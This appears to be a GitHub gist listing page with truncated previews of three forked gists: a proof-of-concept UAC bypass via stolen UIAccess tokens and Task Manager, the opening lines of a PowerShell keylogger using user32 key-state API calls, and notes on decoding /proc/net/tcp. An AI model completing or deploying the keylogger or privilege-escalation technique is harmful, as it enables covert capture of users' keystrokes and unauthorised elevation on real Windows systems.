winger gnusec
gnusec
/ TaskManagerSecret.c
Created
September 28, 2023 07:22
— forked from antonioCoco/TaskManagerSecret.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| TaskManagerSecret | |
| Author: @splinter_code | |
| This is a very ugly POC for a very unreliable UAC bypass through some UI hacks. | |
| The core of this hack is stealing and using a token containing the UIAccess flag set. | |
| A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html | |
| From there it uses a task manager "feature" to run a new High IL cmd.exe. | |
| This has been developed only for fun and shouldn't be used due to its high unreliability. |
gnusec
/ gist:7e8185b070642435ad3a4b3ca8206da8
Created
August 20, 2023 08:49
— forked from dasgoll/gist:7ca1c059dd3b3fbc7277
Simple Windows Keylogger using PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
gnusec
/ proc_net_tcp_decode
Created
July 15, 2021 13:32
— forked from jkstill/proc_net_tcp_decode
decode entries in /proc/net/tcp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Decoding the data in /proc/net/tcp: | |
| Linux 5.x /proc/net/tcp | |
| Linux 6.x /proc/PID/net/tcp | |
| Given a socket: | |
| $ ls -l /proc/24784/fd/11 | |
| lrwx------ 1 jkstill dba 64 Dec 4 16:22 /proc/24784/fd/11 -> socket:[15907701] |